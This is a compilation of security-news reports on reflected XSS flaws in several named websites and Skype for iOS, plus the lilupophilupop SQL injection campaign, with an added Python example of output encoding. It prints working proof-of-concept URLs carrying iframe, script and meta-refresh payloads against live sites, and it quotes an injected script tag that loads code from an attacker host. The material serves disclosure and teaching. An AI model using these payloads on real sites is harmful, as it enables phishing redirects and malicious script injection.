
Times Now TV & Shiksha Official Websites Vulnerable To XSS Security Flaw

Narendra Bhati (R00t Sh3ll The Untracable), a 21-year-old information security expert from Sheoganj, Rajasthan, who was recently acknowledged by Acquia.com and has also found many persistent XSS flaws and one SQL injection in a bank website, has discovered a non-persistent XSS security flaw in the official websites of Shiksha.com and Times Of India (News Bullet, a sub-domain of the Start news channel).

Narendra says: "Kailash Bhayya, Ravi Sir & Sabari Sir, this is for you :-)"

Shiksha.com is part of the naukri.com group, India's No. 1 job portal. Other portals owned by its parent company Info Edge are 99acres.com, JeevanSathi.com, Brijj.com and AskNaukri.com.


TIMES NOW (timesnow.tv) is a leading 24-hour English news channel that gives urban viewers the complete picture of the news that is relevant, presented in a vivid and insightful manner that enables them to widen their horizons and stay ahead.

On all of these websites, the search fields were found to be vulnerable to XSS injection.

POC code for Times Of India Tv:
http://www.timesnow.tv/videosearchresult.cms?query="/><iframe+src="http://www.breakthesecurity.com"+width="1000px"+height="1000px"></iframe>&srchcombo=1&x=0&y=0




POC FOR Shiksha.com :
http://www.shiksha.com/search/index?keyword="/><iframe+src="http://www.breakthesecurity.com"+width=1000+height=1000></iframe>&start=0&institute_rows=-1&content_rows=-1&country_id=&city_id=&zone_id=&locality_id=&course_level=&course_type=&min_duration=&max_duration=&search_type=&search_data_type=&sort_type=&utm_campaign=site_search&utm_medium=internal&utm_source=shiksha&from_page=homepage&autosuggestor_suggestion_shown=5
Narendra also found that shiksha.com is vulnerable to CSRF, which allows an attacker to change the victim's mobile number via a malicious web page.

Narendra also claimed that he tried repeatedly to contact all of these websites by email, Facebook page, etc., but received no reply for a month. After this he decided to disclose the vulnerability and reported it to EHN.

Shane Warne Official Website Vulnerable to XSS Security flaw


Narendra Bhati, a 21-year-old information security expert from Sheogan, Rajasthan, who recently found non-persistent XSS in Brother Soft, Aircel & MTS Mobile and a SQL injection in a bank website, has discovered a non-persistent XSS security flaw in the official website of Shane Warne.

Narendra wants to say: "Maa, Papa and Bhayya, one day I will make you proud of me."

Narendra found that the search query field on the www.shanewarne.com webpage is vulnerable to XSS attack.

Shane's world-class talents have been recognized through a number of distinguished awards, including being named one of only five Wisden's Cricketers of the 20th Century, in Australia's Cricket Team of the 20th Century, BBC Sports Personality of the Year in 2005, and Victoria's Greatest Ever Sportsman in 2002. In 2011 Shane was honored with the unveiling of a bronze statue of him at the Melbourne Cricket Ground, and in early 2012 he was inducted into the Australian Cricket Hall of Fame.

When an attacker visits www.shanewarne.com and enters XSS code in the search field, the entered script executes successfully.

POC code:

http://www.shanewarne.com/search/content?q=<script>alert("E+Hacking+News")</script>

The site also allows users to inject iframe code:
http://www.shanewarne.com/search/content?q="/><iframe+src="http://www.ehackingnews.com"+width=1000+height=1000></iframe>


Narendra also succeeded in redirecting the Shane Warne website to another website. Five seconds after the page loads, it redirects to the injected website, so it is easy for an attacker to redirect users to a phishing website or another site that targets innocent users and steals their credentials.

POC code:

http://www.shanewarne.com/search/content?q=<meta+http-equiv="refresh"+content="2;url=http://www.google.com/">

SourceForge vulnerable to XSS injection

A security researcher, WilyXem from Spain, has discovered a reflected cross-site scripting vulnerability in SourceForge (sourceforge.net).

SourceForge is a web-based source code repository. It acts as a centralized location for software developers to control and manage free and open source software development.

The vulnerability exists in the job-finding page of SourceForge. The developers fail to validate the input coming from the text box that lets users search for jobs.

This leaves the text field vulnerable to attack.



The POC code:
sourceforge.net/jobs?age=1&text=1%22%3E%3Cscript%3Ealert%28%22WilyXem%20==%20UnderC0de.org%22%29%3C/script%3E&zip=10003&submit=Search
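All four reports above (Times Now, Shiksha, Shane Warne and SourceForge) describe the same defect: a search term is reflected into the results page without output encoding, so a value beginning with `"/>` closes the input's attribute and the remainder is parsed as new markup. The following added example, written for this page and not code from any of the affected sites, shows a minimal search-results renderer with that defect beside a hardened version that HTML-encodes the reflected value, and checks both against the payloads already printed in the PoC URLs above. The template and function names are assumptions for illustration.

```python
import html
import re

# Payloads taken from the PoC URLs quoted on this page; used here only to
# show that correct output encoding neutralizes them.
PAGE_PAYLOADS = [
    '"/><iframe src="http://www.breakthesecurity.com" width="1000px" height="1000px"></iframe>',
    '<script>alert("E Hacking News")</script>',
    '<meta http-equiv="refresh" content="2;url=http://www.google.com/">',
]

# Hypothetical results page: the query is reflected twice, once inside a
# quoted attribute and once as text content.
TEMPLATE = (
    '<html><head><title>Search</title></head><body>'
    '<form><input type="text" name="q" value="{attr}"></form>'
    '<p>Results for: {text}</p>'
    '</body></html>'
)

def render_vulnerable(query: str) -> str:
    """Reflects the query verbatim (the defect the posts describe):
    a leading '"/>' terminates the <input> element and everything after it
    is interpreted by the browser as new markup."""
    return TEMPLATE.format(attr=query, text=query)

def render_hardened(query: str) -> str:
    """Same page, with the reflected value HTML-encoded.
    html.escape(quote=True) encodes & < > " and ', so the value can neither
    close the quoted attribute nor open a tag in text content."""
    safe = html.escape(query, quote=True)
    return TEMPLATE.format(attr=safe, text=safe)

# Matches the name of every opening or closing tag in a document.
TAG_RE = re.compile(r'<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)')

def injected_tags(page: str) -> set[str]:
    """Tag names present in the rendered page beyond the template's own."""
    expected = {'html', 'head', 'title', 'body', 'form', 'input', 'p'}
    return {m.group(1).lower() for m in TAG_RE.finditer(page)} - expected

def check_reflection(query: str) -> tuple[set[str], set[str]]:
    """Return (tags injected into the vulnerable page, tags injected into the
    hardened page) for one query; the second set should always be empty."""
    return injected_tags(render_vulnerable(query)), injected_tags(render_hardened(query))

if __name__ == '__main__':
    for payload in PAGE_PAYLOADS:
        vuln, hard = check_reflection(payload)
        print(f'vulnerable page gains {sorted(vuln)}; hardened page gains {sorted(hard)}')
```

Encoding must match the output context: the attribute value is safe here only because it is double-quoted and the encoder converts `"`; an unquoted attribute, a JavaScript string or a URL each need their own encoding, which is why a single site-wide "filter" on input rarely fixes this class of bug.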

Over One Million Pages Infected by lilupophilupop.com SQL Injection: XSS Injection


Last year (yes, last year) on Dec 1st, ISC reported the lilupophilupop.com SQL injection attack (combined with an XSS technique). When they first reported it, the number of infected pages was 80; by the middle of the month it had risen to 160,000. At the end of the month (now), the infected page count has crossed one million.

These sites are infected by injecting the following script:
"></title><script src="http://lilupophilupop.com/sl.php"></script>

According to their report, the infected domains are distributed as follows:

  • NL - 123,000
  • FR - 68,100
  • UK - 56,300
  • DE - 49,700
  • RU - 32,000
  • DK - 31,000
  • COM - 30,500
  • JP - 23,200
  • CA - 16,600
  • ORG - 2,690
  • CN - 505

Researching the log records of the infected sites showed that the attackers try to attack vulnerable sites daily from different IP addresses.

"I put some things you might look for in the comments section of the diary. The easiest place to start will be to look for the 500 error messages, mainly because the final injection is likely to cause your DB product to throw an error which will show as a 500 error. Even if it does not, you may be able to identify the probing queries and from those identify the final injection.

When looking at fixing the problem do not forget that this vulnerability is a coding issue. You may need to make application changes. To address the issue make sure you perform proper input validation for every parameter you accept," said the first report.


Check whether your sites are infected by this attack:
If you want to make sure whether your site is infected by the attack, search in Google as:
"></title><script src="hXXp://lilupophilupop.com/sl.php"></script> site:your_site.com

Replace "your_site.com" with your site's URL.

XSS Vulnerability in US Department of Health Human Services website

An INTRA team member, Jackeh, discovered a non-persistent XSS (cross-site scripting) vulnerability in the website of the Disaster Information Management Research Center.

Vulnerability details:
Type: XSS (non-persistent)
Target URL: phpreparedness.nlm.nih.gov
Vulnerable link: here

Skype for iPhone and iPod Vulnerable to XSS: Attacker Able to Steal Data




A security researcher, Phil, discovered an XSS (cross-site scripting) vulnerability in Skype v3.0.1 and earlier versions for iPhone and iPod touch devices.

Skype uses a locally stored HTML file to display chat messages from other Skype users, but it fails to properly encode the incoming user's "Full Name", allowing an attacker to craft malicious JavaScript code that runs when the victim views the message.


Executing arbitrary JavaScript code is one thing, but he also found that Skype improperly defines the URI scheme used by its built-in WebKit browser. Usually the scheme is set to something like "about:blank" or "skype-randomtoken", but in this case it is actually set to "file://". This gives an attacker access to the user's file system: any file that the application itself would be able to access.

File system access is partially mitigated by the iOS application sandbox that Apple has implemented, which prevents an attacker from accessing certain sensitive files. However, every iOS application has access to the user's AddressBook, and Skype is no exception. He created a proof-of-concept injection and attack that shows a user's AddressBook can indeed be stolen from an iPhone or iPod touch through this vulnerability.

Video Demo: